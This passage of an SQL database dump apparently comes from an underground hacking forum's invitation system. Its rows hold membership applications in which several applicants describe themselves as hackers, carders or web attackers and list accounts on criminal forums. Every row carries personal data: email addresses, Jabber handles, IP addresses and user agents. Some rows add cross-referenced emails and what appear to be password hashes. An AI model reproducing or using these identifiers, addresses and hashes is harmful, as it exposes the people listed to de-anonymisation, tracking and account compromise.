[url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://flu.oregon.gov | flu.oregon.gov \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1672, 1492, 0, 'Invite', 2, '{$name}', 1408366415, '[SIZE=\'4\'][COLOR=\'Sienna\']fifteen[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: blogging4naija@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 154.120.98.13\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://fifteen.nl | fifteen.nl \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1675, 1490, 1670, 'lumbricus', 39, '', 1408372164, 'CODE 200 < Working Fine~', 1, 0, '', 0, 1, 0, 0, 0),
(1676, 1494, 0, 'Invite', 2, '{$name}', 1408376286, '[SIZE=\'4\'][COLOR=\'Sienna\']marconi[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: racetrack@exploit.im\n[b]e-mail[/b]: cleartext@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 117.111.17.225\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : marconi : reirprew@gmail.com : : 67c439ba607a22f570719199fa72f3a2\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.youtube.com/user/smoothflamenco | http://www.youtube.com/user/smoothflamenco \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1677, 1495, 0, 'Invite', 2, '{$name}', 1408377475, '[SIZE=\'4\'][COLOR=\'Sienna\']jerzyboy[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: moneyflow@jabber.ch\n[b]e-mail[/b]: bermudaonads@outlook.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 95.130.9.129\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/jerzyboy | https://twitter.com/hashtag/jerzyboy \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1678, 1496, 0, 'Invite', 2, '{$name}', 1408379384, '[SIZE=\'4\'][COLOR=\'Sienna\']Camelot[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ---\n[b]e-mail[/b]: gabyruss_sv_45@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 92.84.233.116\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://camelot.userlan.ru | camelot.userlan.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1679, 1497, 0, 'Invite', 2, '{$name}', 1408383062, '[SIZE=\'4\'][COLOR=\'Sienna\']still-rise[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: still-rise@khovansky.net\n[b]e-mail[/b]: v.still-rise@yandex.ru\n[b]Info[/b]: php/python coder,hacker,carder\r\nprofiles:\r\nhttps://monopoly.ms/user/468-still-rise/\r\nhttps://korovka.so:6699/member.php?u=1988\r\nhttp://psh-world.ru/member.php?u=11\r\nhttps://exploit.in/forum/index.php?showuser=52493\r\nhttp://vpro.su/member.php?u=90210\r\nhttps://pp24.to/member.php?u=1008\r\nhttps://armada.la/index.php?/user/422-still-rise/\r\ndarkode login:still-rise\r\n\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.165.252.227\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/price_msiza | https://twitter.com/price_msiza \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1680, 1498, 0, 'Invite', 2, '{$name}', 1408401529, '[SIZE=\'4\'][COLOR=\'Sienna\']cosmos9[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: cosmos_9@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 190.41.180.230\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://cosmos9.tistory.com | cosmos9.tistory.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1681, 1499, 0, 'Invite', 2, '{$name}', 1408404200, '[SIZE=\'4\'][COLOR=\'Sienna\']jerzyboyz[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: moneyflow@jabber.se\n[b]e-mail[/b]: bermudaonads@outlook.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 95.211.197.1\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ballardfarmersmarket.wordpress.com/.../sunday-september-1st-taste-that-hard-cider-before-you-buy-it-jerzy-boyz-returns-and-its-st-... | http://ballardfarmersmarket.wordpress.com/.../sunday-september-1st-taste-that-hard-cider-before-you-buy-it-jerzy-boyz-returns-and-its-st-... \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1682, 1500, 0, 'Invite', 2, '{$name}', 1408404295, '[SIZE=\'4\'][COLOR=\'Sienna\']snta[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: d12_pirate_2pac@homail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.107.176.67\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://snta.com | snta.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1683, 1501, 0, 'Invite', 2, '{$name}', 1408411226, '[SIZE=\'4\'][COLOR=\'Sienna\']n00b[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: n00b@exploit.im\n[b]e-mail[/b]: lonelysoul505@yahoo.com\n[b]Info[/b]: Skills:\r\n\r\nWebapp penetration testing\r\nCan code in PHP and Mysql\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 115.242.175.144\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : n00b : angellover@list.ru : 91.76.99.147 : 6f6a6bc26b83f9aad4fab10a3d02b665\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://steve-yegge.blogspot.com/2008/.../portrait-of-n00b.html | http://steve-yegge.blogspot.com/2008/.../portrait-of-n00b.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1684, 1502, 0, 'Invite', 2, '{$name}', 1408436858, '[SIZE=\'4\'][COLOR=\'Sienna\']g0rx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: g0r@jabber.dk\n[b]e-mail[/b]: g0rx@bk.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 109.56.65.25\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://extratorrent.cc/profile/g0rx/ | http://extratorrent.cc/profile/g0rx/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1685, 1503, 0, 'Invite', 2, '{$name}', 1408439952, '[SIZE=\'4\'][COLOR=\'Sienna\']rDNix[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: mynamemishal@gmail.com\n[b]e-mail[/b]: mynamemishal@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 188.70.42.41\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/video6031276_164007162 | http://vk.com/video6031276_164007162 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1686, 1504, 0, 'Invite', 2, '{$name}', 1408450388, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@as.qwe\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1687, 1505, 0, 'Invite', 2, '{$name}', 1408450537, '[SIZE=\'4\'][COLOR=\'Sienna\']testme[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 1488228\n[b]e-mail[/b]: test@microsoft.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 77.109.138.42\n[*][b]real ip[/b]: 77.109.138.42\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://testme.fi | testme.fi \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1689, 1507, 0, 'Invite', 2, '{$name}', 1408453722, '[SIZE=\'4\'][COLOR=\'Sienna\']Becks[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: becks@exploit.im\n[b]e-mail[/b]: be.cks@mail.ru\n[b]Info[/b]: Coding C++, VB.NET (only for gui-stuff)\r\nWebhacking (SQLi, XSS, RFI, LFI etc.)\r\nServer Management (Windows, Linux (Debian))\r\nIn the scene for about 10 years.\r\n\r\nBest regards\r\nBecks\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 88.73.6.205\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Becks : lebedev84@mail.ru : : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://becks.de | becks.de \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1690, 1508, 0, 'Invite', 2, '{$name}', 1408456493, '[SIZE=\'4\'][COLOR=\'Sienna\']dsad[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Emaildasdas@dasdas.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 54.185.68.128\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/dsad | https://twitter.com/hashtag/dsad \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1691, 1509, 0, 'Invite', 2, '{$name}', 1408465225, '[SIZE=\'4\'][COLOR=\'Sienna\']Tetram[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: tetram@zauris.ru\n[b]e-mail[/b]: 7c00h@bk.ru\n[b]Info[/b]: Hey guys, Tetram reporting in.\r\n\r\nI am an embedded systems engineer, interested in low-level stuff.\r\nMy home is the usermode on windows systems, but I am scratching at the gates, if I find the time I will break through :) (but ofc. I know whats going on inside windows)\r\n\r\nSometimes I am innovative, but I also like analyzing and rebuilding code I found in samples.\r\n\r\nMain languages are C and (F)ASM, but also known to Java (will go into android dev soon).\r\n\r\nHm I have a few small projects running just for me atm., one is the rewriting of the ntdll/wow64 layer so I can produce runnable code regardless of the architecture. syscalls and \"heavensgate\" included.\r\n\r\n\r\nI registered here to see some interesting discussions and maybe meet some people with the same mindset.\r\nSadly I currently can\'t speak a single word Russian, but I will put some effort in this. As it seems the only people sharing the same passion as I came from there. (And secretly I love russia :p)\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.221.161.234\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://tetram.cz | tetram.cz \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
